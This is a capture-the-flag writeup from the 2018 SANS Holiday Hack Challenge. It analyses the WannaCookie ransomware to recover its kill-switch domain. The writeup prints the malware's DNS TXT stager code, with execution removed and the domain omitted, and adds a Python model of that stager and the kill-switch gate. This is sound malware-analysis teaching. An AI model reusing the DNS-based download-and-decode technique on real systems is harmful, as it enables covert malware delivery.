March 14, 2019

Stop the Malware

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup

📍 Use the Cookie Recipe document to find the kill-switch domain, then the HoHoHo daddy terminal to register the domain: that terminal is beside the Snort terminal.


Unfortunately, Snort alerts show multiple domains, so blocking that one won’t be effective.

I remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.

Perhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!


Ransomware Kill Switches:

I think I remember reading an article recently about Ransomware Kill Switches. Wouldn’t it be nice if our ransomware had one!


01- Let’s continue the analysis of our malware file:

First, edit source-1.ps1 and remove the iex call, so that the downloaded PowerShell file wannacookie.min.ps1 is only decoded and not executed:

The code after editing (the stager domain is omitted here):

function H2A($a) { $o; $a -split '(..)' | ? { $_ } | ForEach-Object { [char]([convert]::ToInt16($_, 16)) } | ForEach-Object { $o = $o + $_ }; return $o }
$f = "77616E6E61636F6F6B69652E6D696E2E707331"
$h = ""
foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server -Name "$" -Type TXT).strings, 10) - 1)) { $h += (Resolve-DnsName -Server -Name "$i.$" -Type TXT).strings }
$(H2A $h | Out-String)

02- Let’s run the modified script and save the result to wannacookie.min.ps1 by appending | out-file wannacookie.min.ps1 to the command:

.\source-1.ps1 | out-file wannacookie.min.ps1

It will take some time; wait until it finishes.

03- Let’s look at wannacookie.min.ps1 :

type .\wannacookie.min.ps1


It’s hard to read here, so let’s look at it in Visual Basic Code: open the file there and clean it up to get a better view. After clean-up the file looks like this:


04- Let’s read the code after we cleaned it:

  • AES Encryption function e_d_file
  • Conversion functions H2B , A2H , H2A , B2H, ti_rox
  • Compression function B2G
  • Decompress function G2B
  • Hashing function sh1
  • Encrypt function using PublicKey p_k_e
  • Encrypt and Decrypt function e_n_d
  • Get using DNS function g_o_dns
  • Split function s_2_c
  • Send using DNS function snd_k
  • The Main function wanc

05- We are looking for a kill-switch domain, like the one in the WannaCry malware, that stops this ransomware before it runs. Such a check has to sit at the beginning of the main function:

A. Let’s take a look at the first code in the main function:


This line makes a DNS request using $S1 after applying a few functions to convert and compress it; the query is then sent to Google’s DNS server. If the answer is not null ($null -ne), the rest of the code keeps running, but if the answer is null, the code exits (return) and stops.

The -ErrorAction 0 option also makes the cmdlet silently continue even if there is an error.

return exits the current scope, which can be a function, script, or script block.

This seems to be our kill switch, so we need to figure out the DNS query name.

B. From the previous steps you will have noticed that the malware uses DNS requests whose subdomain label refers to the file or message it needs. Here the request uses this label: 6B696C6C737769746368

C. Let’s decode it from hex as before:

6B696C6C737769746368 > killswitch

So this confirms that the kill-switch domain must be in this code block.
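To make the two DNS mechanisms seen so far concrete (the chunked TXT download that source-1.ps1 performs in step 01, and the hex label 6B696C6C737769746368 decoded above), here is an added Python model written for this writeup. It is not the malware's code and not part of the original post: the function names, the fake zone data and the placeholder stager domain are assumptions made here; only the hex strings and the kill-switch domain yippeekiyaa.aaay come from the writeup. The kill-switch gate is simplified to "does the domain resolve", without the XOR key derivation the real sample performs.

```python
"""Offline model of the WannaCookie DNS stager and kill-switch gate.

Added example for this writeup, not the malware's own code. The DNS zone
contents, the function names (a2h, h2a, resolve_txt, build_fake_zone,
fetch_staged_payload, killswitch_engaged) and the stager domain below are
constructed assumptions; only the hex strings and the kill-switch domain
are taken from the writeup.
"""

# Placeholder for the attacker-controlled domain the writeup leaves out.
STAGER_DOMAIN = "stager.example.invalid"
# Kill-switch domain recovered in the writeup.
KILL_SWITCH_DOMAIN = "yippeekiyaa.aaay"


def a2h(text: str) -> str:
    """ASCII -> uppercase hex, the encoding used for the filename label in the stager."""
    return text.encode("ascii").hex().upper()


def h2a(hexstr: str) -> str:
    """Hex -> ASCII, mirroring H2A: split into two-character pairs, map each to a char."""
    pairs = [hexstr[i:i + 2] for i in range(0, len(hexstr), 2)]
    return "".join(chr(int(p, 16)) for p in pairs)


def resolve_txt(zone: dict, name: str):
    """Stand-in for Resolve-DnsName ... -Type TXT against a constructed zone.
    Returns the TXT strings for the name, or None (the $null case)."""
    return zone.get(name.lower())


def build_fake_zone(filename: str, payload: str, chunk: int = 16) -> dict:
    """Constructed zone laid out the way the stager expects it:
       <hex(filename)>.<domain>       TXT = number of chunks
       <i>.<hex(filename)>.<domain>   TXT = i-th hex chunk of the payload
    """
    hexname = a2h(filename)
    hexpayload = a2h(payload)
    chunks = [hexpayload[i:i + chunk] for i in range(0, len(hexpayload), chunk)]
    zone = {f"{hexname}.{STAGER_DOMAIN}".lower(): [str(len(chunks))]}
    for i, c in enumerate(chunks):
        zone[f"{i}.{hexname}.{STAGER_DOMAIN}".lower()] = [c]
    return zone


def fetch_staged_payload(zone: dict, filename: str = "wannacookie.min.ps1") -> str:
    """Reproduce source-1.ps1 without the final iex: ask for the chunk count,
    pull every chunk in order, then hex-decode the reassembled string."""
    hexname = a2h(filename)
    count = int(resolve_txt(zone, f"{hexname}.{STAGER_DOMAIN}")[0], 10)
    h = ""
    for i in range(count):
        h += resolve_txt(zone, f"{i}.{hexname}.{STAGER_DOMAIN}")[0]
    return h2a(h)


def killswitch_engaged(public_zone: dict, domain: str = KILL_SWITCH_DOMAIN) -> bool:
    """Simplified model of the gate at the top of wanc: if the kill-switch name
    resolves (someone has registered it), the main function returns before
    doing anything else."""
    return resolve_txt(public_zone, domain) is not None


if __name__ == "__main__":
    zone = build_fake_zone("wannacookie.min.ps1", "Write-Host 'stage two'")
    print(fetch_staged_payload(zone))                   # Write-Host 'stage two'
    print(h2a("6B696C6C737769746368"))                  # killswitch
    print(killswitch_engaged({}))                       # False: unregistered, malware proceeds
    print(killswitch_engaged({KILL_SWITCH_DOMAIN: ["registered"]}))  # True: gate fires, main returns
```

The payload here is a harmless constructed string; the point is that the download is nothing more than a TXT chunk count followed by numbered hex chunks, and that the only thing standing between the stager and execution is whether one domain name resolves.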

D. Let’s use PowerShell ISE to set breakpoints, view the data as it is transmitted, and call functions from the malware script.

E. Run PowerShell ISE and open the file wannacookie.min.ps1, then extract the query name expression from the script block, put it on a new line after $S1 and assign it to $ks. The code will be:


Also add a breakpoint after the $ks line to stop the script, then run it.

In the bottom console, type $ks to print out the domain name used in the DNS query:


We found it! yippeekiyaa.aaay

06- Go to the HoHoHo daddy terminal and register the domain “yippeekiyaa.aaay” to stop the malware from causing new infections:




Yippee-Ki-Yay! Now, I have a ma... kill-switch!